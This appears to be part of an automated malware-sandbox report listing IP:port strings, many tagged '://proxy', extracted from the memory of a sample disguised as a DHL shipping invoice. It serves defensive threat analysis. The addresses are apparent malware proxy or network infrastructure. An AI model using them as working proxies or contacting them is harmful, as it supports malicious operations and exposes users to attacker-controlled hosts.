                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.222.252.187:8193://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9800C9000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980135000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.234.125.3:443
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9800C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.234.125.3:443://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.234.125.5:443
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.234.125.5:443://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.43.214.205://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.54.26.187:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.102.47.83:8219
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.102.47.83:8219://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.189
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.189:34405
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.189:34405://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.193
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.193:34409
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.193:34409://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.202:34409
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.202:34409://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.207
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.207:34405
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.207:34405://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.211:34409
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.211:34409://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.213
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.213:34411
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.213:34411://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.216:34405
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.216:34405://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.220
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.220:34409
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.110.188.220:34409://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.118.43.143
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.118.43.143://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.118.43.143:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.161.133.200
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.161.133.200://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.161.133.200:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.192.31.37:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.200.74.139:1685://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98114F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.244.235.217:4153
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98114F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.244.235.217:4153://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.252.73.23:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.252.73.23:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.33.205.4:1080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.33.205.4:1080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.42.99.22:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.42.99.22:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.43.122.158:1080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.43.122.158:1080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981FD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.5.143.42:3366
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.5.143.42:3366://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.83.137.142:34724
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.83.137.142:34724://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.83.137.165:34201
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.83.137.165:34201://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.83.137.30:41274
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.83.137.30:41274://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.83.138.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.83.138.186:38277
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.83.138.186:38277://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.83.138.60:51640
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.83.138.60:51640://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.83.142.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.83.142.100:39209
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.83.142.100:39209://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.83.143.147:17636://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.87.255.155:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.87.255.155:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.88.109.89:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.88.109.89:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.136.75.85:57607://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.136.78.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.136.78.200:19925
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.136.78.200:19925://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.136.78.200:28513://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.136.78.200:39272
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.136.78.200:39272://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.136.78.200:40927
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.136.78.200:40927://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.136.79.177:38772
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.136.79.177:38772://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.136.79.177:56205
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.136.79.177:56205://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.14.32.67:4153
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.14.32.67:4153://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.143.113.82
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.143.113.82://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.143.113.82:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9834A9000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9834FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.149.103.133:61859
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9834B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.149.103.133:61859://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.16.81.147:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.16.81.147:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.226.11.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.226.11.149:41878
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.226.11.149:41878://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.226.16.46:51372
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.226.16.46:51372://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.226.16.46:51372H
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.230.107.235:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.233.161.246:4153
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.233.161.246:4153://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9802FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.233.177.180:3000
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9802FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.233.177.180:3000://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.247.209.185:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.247.209.185:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.32.66.64:50163
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.32.66.64:50163://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.33.126.130
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.33.126.130://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.33.126.130:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9837EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.6.155.9
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.6.155.9:19000
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9837EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.6.155.9:19000://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.10.242.18:29057
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.10.242.18:29057://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.10.242.18:30670
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.10.242.18:30670://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.107.129.72:10180
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.107.129.72:10180://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.137.184.253
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.137.184.253://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.137.184.253:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.176.187
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.176.187.99:8889
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.176.187.99:8889://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.145.94.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.145.94.196:4153
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.145.94.196:4153://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.182.153.29:12000
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.182.153.29:12000://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.182.210.152
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.182.210.152://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.182.210.152:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9805EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.196.138.91:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98064A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.196.138.91:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.21.148.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.21.148.50:33192
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.21.148.50:33192://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.21.148.70:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.21.148.70:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.219.74.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.219.74.130:8888
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.219.74.130:8888://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.25.215.194:4153
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.25.215.194:4153://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980B65000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.187.67.49:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.187.67.49:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.252.244.126
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981427000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.252.244.126://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981427000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.252.244.126:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.255.187.60
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.255.187.60://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.255.187.60:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.57.210.186:9002
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.57.210.186:9002://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.75.69.50:57903x
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.91.158.230:7302
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.91.158.230:7302://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://220.134.221.76:1134
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://220.134.221.76:1134://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://220.247.162.7:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://220.247.162.7:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9813C0000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9813A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://220.248.70.237:9002
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9813A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://220.248.70.237:9002://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://220.77.191.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://220.77.191.154:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://220.77.191.154:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://221.151.181.101:8000
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://221.151.181.101:8000://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://221.6.139.190:9002
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://221.6.139.190:9002://proxy
